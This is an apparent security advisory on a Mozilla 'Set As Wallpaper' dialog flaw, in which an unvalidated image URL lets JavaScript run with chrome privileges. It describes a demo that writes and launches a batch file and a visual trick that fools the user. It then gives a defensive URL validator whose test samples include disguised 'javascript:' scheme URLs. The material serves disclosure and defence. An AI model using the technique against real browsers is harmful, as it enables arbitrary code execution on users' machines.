The "Set As Wallpaper" dialog takes the image URL as a parameter without validating it.
This allows JavaScript to execute in chrome and to run arbitrary code.
By using absolute positioning and the moz-opacity filter, an attacker can easily fool the
user into thinking he is setting a valid image as wallpaper.
Right-click on the image and choose "Set As Wallpaper". The demo requests
UniversalXPConnect rights, creates c:\booom.bat and launches the batch file,
which shows a directory listing in a DOS box (Windows only).
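
The missing check described above, as an added example (not code from the original advisory or from Mozilla): a scheme allow-list applied to the image URL before it is handed to a privileged dialog. The function names, the http/https-only policy and the sample URLs are assumptions made for illustration.

```javascript
// Added example: hypothetical validator, not Mozilla's code.
// Assumed policy: wallpaper images may only be loaded from these schemes.
const ALLOWED_SCHEMES = new Set(["http:", "https:"]);

// Returns { ok: true, url } for an acceptable image URL,
// or { ok: false, reason } for anything else.
function validateWallpaperUrl(raw, baseUrl) {
  if (typeof raw !== "string" || raw.length === 0) {
    return { ok: false, reason: "empty or non-string URL" };
  }
  let parsed;
  try {
    // The WHATWG parser trims surrounding spaces/control characters, strips
    // tabs and newlines, and lower-cases the scheme, so disguised spellings
    // of a scheme are normalised before the comparison below.
    parsed = new URL(raw, baseUrl);
  } catch (e) {
    // Relative URL without a base, or otherwise malformed input.
    return { ok: false, reason: "unparseable URL" };
  }
  // Compare the parsed scheme, never a prefix of the raw string.
  if (!ALLOWED_SCHEMES.has(parsed.protocol)) {
    return { ok: false, reason: "scheme not allowed: " + parsed.protocol };
  }
  // Hand on the normalised form, not the caller-supplied string.
  return { ok: true, url: parsed.href };
}

// Constructed sample inputs (not taken from the advisory).
const SAMPLES = [
  "https://example.test/cat.png",
  "javascript:void(0)",
  " JaVa\tScRiPt:void(0)",
  "data:image/png;base64,AAAA",
  "chrome://browser/content/",
];

// Runs every sample through the validator; true means accepted.
function classifySamples() {
  return SAMPLES.map((s) => validateWallpaperUrl(s).ok);
}
```

Only the first sample is accepted; the privileged code should receive the returned `url` value rather than the original parameter.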